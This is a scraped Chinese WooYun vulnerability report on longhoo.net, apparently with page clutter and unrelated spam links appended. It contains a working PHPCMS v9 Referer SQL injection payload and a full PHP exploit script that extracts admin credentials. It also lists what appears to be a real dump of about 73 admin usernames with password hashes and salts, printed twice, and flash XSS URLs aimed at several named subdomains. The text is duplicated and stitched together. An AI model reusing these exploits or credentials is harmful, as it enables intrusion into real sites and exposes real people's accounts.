20--&hangcheng:7b0524fcc8d940bb42b506bd5e5ea533:9Yy5YZ
21--&liuyanan:76bcaacdede:EDzgfd
22--&lizhen:a5f42a630bec5eef3b9f35d00dba861a:bBuNf2
23--&???:8c955d13f969cbd36b9a6efaa1cbwY
24--&guorenke:259daa89dcccba53fc40d53d:9lMM2r
25--&wangqianhong2:ca65b191e027bf51a4fef66:Wp8sdM
26--&liyuqin:5e63eef2dc05e3b4fa233d:njxKt6
27--&zhouxian:5c8f654fab2a33da28fe5e466eeaa0a8:MgiJbq
28--&gengtingting:f718ca49fb311f33a772:WwgzWc
29--&???:4dd6c6bfa1d28fabc0d4:yMS9EW
30--&???:fc833eecb97e8da0d3b3a2:NFfQ74
31--&syj:b4cb5b1d4974121cdfccc7e79548aea7:CvmkLd
32--&qianduan:2bdeba90ad:pmlpg8
33--&zhaiyue:11a53bf3e9baaed25f4a52e7e9fcc6fd:lbiuRm
34--&liangqiong:b626b228d8ebaf9c0bb70bbe841f9d4f:sqIfjt
35--&zhuting:570edf21f:YFQQMW
36--&zhangzhao:1bf931be0baac03ae7cb703:5wIlIM
37--&zhuxinhui:dfe4ad37ecfd31:KM2Ua1
38--&zhuanglingyan:51a63b6c29c004f83cf432c88c23139b:B33lpe
39--&qianmengmeng:12bade848e52b13b2d6820:snxMEj
40--&guzhiming:ee39f1ae2fa370c4562edf1:UY3fks
41--&suntingting:0ba2e2216624bdd45fe20:4girVD
42--&gaofei:8fce79e84c3bbb8e8d8904:1qbzqF
43--&yufan:04b6ef433d9120eace216a0b6da267ea:4k4fDt
44--&sunyi:2a7e1ea7c13:qAyjs1
45--&xushan:fb8f02d39fd89accb1fac4b10b45545e:1HCdsl
46--&chenwenhui:2e7014feae096afcc19e16ea:CALG1Q
47--&taoyuge:c296bb6e4ad7fb1fdaaa:A5FK2g
48--&zhangxu:5fd42c0ca21ea1cda7a9d8:GYkqhc
49--&huanghui:320e48fd925cb57f5c9554b:nJ3ChN
50--&libailiang:7e686c8a7c7ef077b5473cdd0cfa9c47:wRj2zG
51--&zhangling:82aa0a317c9f382ecfe920a:Qc4EZz
52--&liujiajia:ab6a325e51cbe46fd7081:8WVSbS
53--&dingjie:be79dd3f20a128f3f5e7a212c38a5f0e:KnLeA8
54--&yanling:13151fdb2fd283c60dfabdf:pEaEll
55--&liujing:ff370dadc9b27f:KJpKcA
56--&jiangchuan:cdff938f19de3ebe03d0db03a9b2918e:5Ndh9x
57--&chenjiahui:f84cfa5fa080c582c91524:dh4Hh6
58--&shangyan:2aba69a43b4ee43f800afd2:9vHRkb
59--&gaojie:829d3ade3b07d03b7d030a636c75d29f:MkhXcJ
60--&sunxiaopei:9a9d68db67cb1a637bb3bba91ef01257:JesIwv
61--&??????:dadec15b5e3daf7:yjvxsW
62--&huangjianchun:e86a245de0a3c7e51db46a2f831648ea:w41LcU
63--&nieziyi:e3d3fdb2e86badc197d124:uqXNy8
64--&sunlu:8a0abb7b8abce:BZK6dv
65--&test1:d267c4bd5c72df175c57a6c:mzuHyC
66--&???:a92cef551a1ed5d5e20b2ca9e19822d0:jV3l4Y
67--&?????:56dad8fcc33ec928cd52074:Zaa4wx
68--&nirui:cd373abf474b2b71fc07de:3k3Szx
69--&dongshu:f2bbe7:6TXAAw
70--&wk:54b72acff0c1fe504e64c1049feab6fb:BVXnFL
71--&????:4f55848e95efb4eef079:pPQI7N
72--&???:409edfe9db:zlrl3T
最后补充几个反射型XSS:
code 区域http://art.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://cm.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://house.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://news.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://pinglun.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://test.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://vote.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zhaopin.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zt.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:无影响厂商忽略
忽略时间: 12:40
厂商回复:
漏洞Rank:4
(WooYun评价)
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
嘿嘿,学习了~
登录后才能发表评论,请先人人网 - 抱歉
哦,抱歉,好像看不到了
现在你可以:
看看其它好友写了什么
北京千橡网景科技发展有限公司:
文网文[号··京公网安备号·甲测资字
文化部监督电子邮箱:wlwh@··
文明办网文明上网举报电话: 举报邮箱:&&&&&&&&&&&&分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
问题的根本在PHPCMSv9 的Rerferer注入
EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1
code 区域Referer:vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
经过修改后的http head是这样的
code 区域Host: vote.longhoo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/ Firefox/12.0
Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8
Accept-Language: en-US,q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=7654308-&ntime=&cnzz_a=0&retime=6&sin=<ime=6&rtime=0
Referer:http://vote.longhoo.net’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
借用独自等待的EXP
code 区域&?php
* Created by 独自等待
* User: Hack2012
* Date: 13-2-4 下午8:25
* FileName: phpcmsv9_post_v3.php
* 独自等待博客
print_r('
+------------------------------------------------------+
PHPCMS_V9 poster_click 注入EXP
Exploit BY: 独自等待
+------------------------------------------------------+
if ($argc & 3) {
print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
//取得管理员个数
$cmd1 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
//echo send_pack($cmd1);
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
//取得管理员表前缀
preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match);
$tableadmin = $prefix_match[1] . '_admin';
//取得管理员个数
$cmd2 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
$count = $num_match[1];
echo '共有' . $count . '个管理员' . &\n&;
//取得管理员用户名及数据
if (preg_match('/Duplicate/', send_pack($cmd2))) {
foreach (range(0, ($count - 1)) as $i) {
$payload = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
if (preg_match('/charset=utf-8/', send_pack($payload))) {
echo $i . '--&' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
echo $i . '--&' . $admin_match[1] . &\n&;
//echo $admin_match[1]. &\n&;
//echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
//echo mb_convert_encoding($admin_match[1],'gbk','auto').&\n&;
exit(&报告大人,网站不存在此漏洞,你可以继续秒下一个!\n&);
//提交数据包函数
function send_pack($cmd)
global $host, $
$data = &GET & . $path . &/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n&;
$data .= &Host: & . $host . &\r\n&;
$data .= &User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/ Firefox/18.0\r\n&;
$data .= &Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8\r\n&;
$data .= $cmd . &\r\n&;
$data .= &Accept-Language: zh-cn\r\n&;
$data .= &Connection: Close\r\n\r\n&;
//这里一定要2个\r\n否则将会一直等待并且不返回数据
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '--&' . $
exit('Could not connect to: ' . $host);
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
fclose($fp);
//时间统计函数
function func_time()
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
code 区域0--&mracale:61a79cfd7b4b17662bf2c:AAWFSX
1--&chengang:76d576c20c57eca10486:Fyy1Ld
2--&zoujiachen:e6ec2a15a109fbb95c702ed4a035bbce:BUXrgv
3--&grk:bdc29d746bcd81a4575f4a:UKTVlF
4--&zxl:4a07f0c4444febcaa773761:jhA7wb
5--&jh:a01e9c2de530:nM91JM
6--&yuanzong:dce8e5c777a945e39a9a9d1:AWu4Tt
7--&zy:2beccf0918f15dda521bec03:xLaTcB
8--&wy:73c59ce21de8fa61d7bf3e4:If3lwL
9--&hongli:3359bbb23b10fe3c3ed9de77e0199d28:zbY3dg
10--&xueshan:e8f3c711cc4d319573cef3c6c8c441fd:AvXHZa
11--&hl:8ca34a75aaa599b8d7a5cbdd9d1a06c5:bLP1Qv
12--&?????????:907be2ae09e1eccc0741:a9YeCF
13--&???:1e43cde0ffd0cfcb72e600:92E7bt
14--&wangqianhong:95854cea8dc2de:ajw7zY
15--&qdh:b205d0afe6ae3f2f6bfc2ee:Z2gHlP
16--&?????????:e6d2ceaf8a8beff0f8fb0:RW5U6G
17--&??????:9818065deac:PJUQpV
18--&???:feb8446c69:rA2iCe
19--&??????:f4eecf7d1df6ecd286af:ZbEWQP
20--&hangcheng:7b0524fcc8d940bb42b506bd5e5ea533:9Yy5YZ
21--&liuyanan:76bcaacdede:EDzgfd
22--&lizhen:a5f42a630bec5eef3b9f35d00dba861a:bBuNf2
23--&???:8c955d13f969cbd36b9a6efaa1cbwY
24--&guorenke:259daa89dcccba53fc40d53d:9lMM2r
25--&wangqianhong2:ca65b191e027bf51a4fef66:Wp8sdM
26--&liyuqin:5e63eef2dc05e3b4fa233d:njxKt6
27--&zhouxian:5c8f654fab2a33da28fe5e466eeaa0a8:MgiJbq
28--&gengtingting:f718ca49fb311f33a772:WwgzWc
29--&???:4dd6c6bfa1d28fabc0d4:yMS9EW
30--&???:fc833eecb97e8da0d3b3a2:NFfQ74
31--&syj:b4cb5b1d4974121cdfccc7e79548aea7:CvmkLd
32--&qianduan:2bdeba90ad:pmlpg8
33--&zhaiyue:11a53bf3e9baaed25f4a52e7e9fcc6fd:lbiuRm
34--&liangqiong:b626b228d8ebaf9c0bb70bbe841f9d4f:sqIfjt
35--&zhuting:570edf21f:YFQQMW
36--&zhangzhao:1bf931be0baac03ae7cb703:5wIlIM
37--&zhuxinhui:dfe4ad37ecfd31:KM2Ua1
38--&zhuanglingyan:51a63b6c29c004f83cf432c88c23139b:B33lpe
39--&qianmengmeng:12bade848e52b13b2d6820:snxMEj
40--&guzhiming:ee39f1ae2fa370c4562edf1:UY3fks
41--&suntingting:0ba2e2216624bdd45fe20:4girVD
42--&gaofei:8fce79e84c3bbb8e8d8904:1qbzqF
43--&yufan:04b6ef433d9120eace216a0b6da267ea:4k4fDt
44--&sunyi:2a7e1ea7c13:qAyjs1
45--&xushan:fb8f02d39fd89accb1fac4b10b45545e:1HCdsl
46--&chenwenhui:2e7014feae096afcc19e16ea:CALG1Q
47--&taoyuge:c296bb6e4ad7fb1fdaaa:A5FK2g
48--&zhangxu:5fd42c0ca21ea1cda7a9d8:GYkqhc
49--&huanghui:320e48fd925cb57f5c9554b:nJ3ChN
50--&libailiang:7e686c8a7c7ef077b5473cdd0cfa9c47:wRj2zG
51--&zhangling:82aa0a317c9f382ecfe920a:Qc4EZz
52--&liujiajia:ab6a325e51cbe46fd7081:8WVSbS
53--&dingjie:be79dd3f20a128f3f5e7a212c38a5f0e:KnLeA8
54--&yanling:13151fdb2fd283c60dfabdf:pEaEll
55--&liujing:ff370dadc9b27f:KJpKcA
56--&jiangchuan:cdff938f19de3ebe03d0db03a9b2918e:5Ndh9x
57--&chenjiahui:f84cfa5fa080c582c91524:dh4Hh6
58--&shangyan:2aba69a43b4ee43f800afd2:9vHRkb
59--&gaojie:829d3ade3b07d03b7d030a636c75d29f:MkhXcJ
60--&sunxiaopei:9a9d68db67cb1a637bb3bba91ef01257:JesIwv
61--&??????:dadec15b5e3daf7:yjvxsW
62--&huangjianchun:e86a245de0a3c7e51db46a2f831648ea:w41LcU
63--&nieziyi:e3d3fdb2e86badc197d124:uqXNy8
64--&sunlu:8a0abb7b8abce:BZK6dv
65--&test1:d267c4bd5c72df175c57a6c:mzuHyC
66--&???:a92cef551a1ed5d5e20b2ca9e19822d0:jV3l4Y
67--&?????:56dad8fcc33ec928cd52074:Zaa4wx
68--&nirui:cd373abf474b2b71fc07de:3k3Szx
69--&dongshu:f2bbe7:6TXAAw
70--&wk:54b72acff0c1fe504e64c1049feab6fb:BVXnFL
71--&????:4f55848e95efb4eef079:pPQI7N
72--&???:409edfe9db:zlrl3T
最后补充几个反射型XSS:
code 区域http://art.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://cm.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://house.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://news.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://pinglun.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://test.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://vote.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zhaopin.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zt.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:无影响厂商忽略
忽略时间: 12:40
厂商回复:
漏洞Rank:4
(WooYun评价)
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
嘿嘿,学习了~
登录后才能发表评论,请先}
我要回帖
更多关于 展示框密码门 的文章
更多推荐
- ·富士康增城工厂最新消息在美国建面板厂超70亿美元投资,如何与特朗普政府协商?
- ·金赛增哪里可以购买的使用是否安全,存在哪些潜在风险?
- ·GEV什么是新能源行业平台如何促进投资者的社会责任感?
- ·有人知道香港的什么叫重大疾病保险险产品我应该咋入手?
- ·请问应该去哪看金价怎么查询啊数据的啊?
- ·宝诚宝美(北京)商贸有限公司是真的还是假的
- ·塘厦艺峰实业 地块美景实业有镶石部
- ·富阳东方茂开元名都有快递公司吗
- ·投资入股旧店是该怎样算
- ·龙陵县纪检监察网锡矿品位一般多少?
- ·在哪里租房子两三间是独院离兰州市保育院在哪里最近的简单便宜房子
- ·江湖地摊货源批发网批发价格1到5元暖手袋
- ·山东泰龙饲料的私怎么读,为啥是饲证
- ·花2000多买的2000黄金价格结果回家一称只有4克多能腿吗
- ·东台博爱家园对口小学有房产证吗
- ·做生意注册开公司做生意第一个什么字好
- ·HCYC中国烟草喷码查询是哪个省市的?
- ·一样的,进不去了,还电脑连不上wifi怎么办电脑怎么办
- ·格力王者之尊怎么样风尚的输出功率怎么调?
- ·请我的世界展示框密码门A44748网络密码
- ·我已经开通了三个月超级会员开通,再开通年超级会员开通会叠加吗
- ·qq号给我一个qq
- ·t4.nxlahjtpx.comm
- ·苹果6s充满电有提示吗plus充电充满后就会一直滴是什麼情况
- ·求婺源微信发布二手交易平台有哪些信息平台
- ·初次在亲朋棋牌7298游戏中心中在电脑上开启互通功能但手机在很远的地方能开通嘛?
- ·电影ruru公厕门门7分53视频录像百度云
- ·288型经编机288win7 打印图片偏淡讲解
- ·S30408与304iV什么材料
- ·www.apk99.net的安装码66.net
- ·兴城巨无霸水玲珑老板娘娘怎莫样
- ·陌陌捕鱼可以提现嘛
- ·富士康iqciqc来料检验报告流程图表
- ·监利外卖哪里有卖龙虾地龙网
